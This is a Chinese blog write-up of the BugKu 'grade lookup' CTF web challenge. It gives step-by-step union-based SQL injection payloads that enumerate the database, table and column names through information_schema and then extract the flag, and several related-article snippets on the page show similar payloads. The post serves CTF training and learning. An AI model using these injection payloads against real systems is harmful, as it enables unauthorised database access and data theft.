BugKu——Web——成绩查询

最新推荐文章于 2024-06-03 21:49:45 发布
最新推荐文章于 2024-06-03 21:49:45 发布
阅读量1.9k 收藏 12
点赞数 10
分类专栏: BugKu 文章标签: 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/120055108
版权

SQL注入 Web安全 数据库漏洞 信息泄露 攻防实践
关键词由CSDN通过智能技术生成

BugKu——Web——成绩查询

1.拿到题目先测试注入点,分别输入了1,2,3,4;输入到4的时候没有回显
在这里插入图片描述
2.当我们输入1'时会报错,而我们使用1'#时就不会报错
在这里插入图片描述
3.测试or,and等关键字
1' or 1=1#
1' and 1=2#
发现没有被过滤
在这里插入图片描述

在这里插入图片描述
4.判断列名
1' order by 1,2,3#
在这里插入图片描述
三列,四列的时候依然回显正常,而当我们输入第五列的时候报错,说明有四列1' order by 1,2,3,4,5#

在这里插入图片描述

5.查看显位点

-1' union select 1,2,3,4#

在这里插入图片描述
6.可以看到显位点是在4上,爆库开始

-1' union select 1,2,3,database()#

在这里插入图片描述
7.知道库名:skctf,爆表开始

-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf'#

在这里插入图片描述
8.知道库名——skctf,表名——fl4g,接下来我们爆字段名

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'#

在这里插入图片描述
9.接下来爆字段内容

-1' union select 1,2,3,group_concat(skctf_flag) from fl4g#

在这里插入图片描述
得到flag:

flag{d0578745a66a685ca161aad8e71f858e}

参考链接:https://blog.csdn.net/m_de_g/article/details/117675569?spm=1001.2014.3001.5501

山川绿水
关注
  • 10
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
自学web前端练手——简易版成绩统计页面(html+css+js)
lvshaoshishang的博客
03-27 3551
遇到的问题: ①刚开始innerHTML一直显示不出来,然后发现是犯了之前跟“js的随机验证码和验证”这篇博文一模一样的错误_(:з」∠)_ var number=f1.getElementsByTagName(‘input’); //获取到的时一组元素,number[i]时其中的一个文本框元素,它的值得通过value属性来获取, number[i].value才是某个文本框元素的值 ②表单提交后...
bugku 成绩查询(sql)
qq_63875498的博客
12-04 775
bugku 成绩查询(sql)
BugKu_web17(成绩查询
羽的博客
05-08 337
成绩查询,数据库交互,那就在考察SQL注入漏洞。 正常输入1,2,3试试。 就正常步骤判断是否存在sql注入。 输入1 有反应 输入1’ 没有反应 判断是数字型注入
bugku-web-成绩查询
qq_75121443的博客
04-01 395
这里是一个post请求,必定连接数据库,可以尝试sql注入。联合查询注入得到当前权限账号、库名、MySQL版本号。首先注入点确定,这里有4个注入点。得到字段skctf_flag。
Bugku---web---成绩查询
最新发布
weixin_47450099的博客
06-03 540
sql注入相关知识,内有各种爆破语句
Bugku 成绩查询WEB
soysauce123的博客
08-15 462
今天咱们尝试用一下一个新的工具,sqlmap,这是一个用于sql注入等等相关的一个很不错的工具。大家好,作为一个CTF方面的小白,以后我也希望每做一次题目就和大家分享分享自己的解题过程。我们都清楚http的请求方式有两种一个get,一个post,这里就是post。那现在这就是里面最后的文件里,【确信】flag肯定就在里面了打开他!然后这里我们是用登陆框的形式输入的,我们就可以想到post登陆框注入。看看找到了啥,四个库~~就我分析这个ctf就很显眼,我估计就是这个嘿嘿。然后就可以开始查询了,先搜索库。...
Bugku-成绩查询
qq_56611811的博客
05-17 421
进入题目差不多能够猜到是关于sql注入的题,1'没有返回结果,1'#能够成功查询,这说明注释符是有效果的。2.当num是5时无法回显内容,说明表可能有4列。
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
bugku--成绩查询
hxhabcd123的博客
08-28 1479
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
Bugku-web之never_give_up
weixin_42939822的博客
03-13 2212
Bugku-web之never_give_up
【CTF-webbugku-成绩查询(sql注入)
Sankkl1的博客
08-17 580
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
bugku 成绩查询
m0_73721944的博客
12-22 381
这意味着 -d "skctf" 这部分的语法有问题。但报错了(看别人的wp爆出的库是skctf_flag,不知道为什么,我查询语句时也是skctf)按照我查询到的库skctf,字段skctf_flag。一个数据库skctf(估计flag就在里面)skctf中只有两个表 fl4g,sc。大佬的wp确实有,也许是现在做了修改。我想用下面的语句爆skctf中的库。说明库确实是skctf_flag。所以skctf_flag是表?得到了两个表,fl4g和sc。爆出了三个库,五十三个表。发现了一个库skctf。
Bugku Web CTF-学生成绩查询
No Title
12-16 1195
Bugku Web CTF-学生成绩查询 该题解题思路是SQL注入,测试思路如下:。 直接输入’单引号没有回显; 输入’#有回显; 通过union来猜解该表有多少列: 0' union select 1,2,3,4# 可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。 获取数据库名: 0' union select 1,user(),database()...
Bugku——成绩单(web
csu_vc的博客
10-27 2344
可以大概判断出有四个字段 直接上payload-1' union select 1,2,3,database()# -1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#-1' union select 1,2,3,group_conc
BugkuCTF】Web--成绩
VZZmieshenquan的博客
02-09 1071
Description: 快来查查成绩吧 http://123.206.87.240:8002/chengjidan/ Solution: Flag:
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制等。 关于具体解题的详细步骤和方法,可以参考解题过程中的记录。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [bugku pwn libc](https://download.csdn.net/download/kety_gz/11656088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值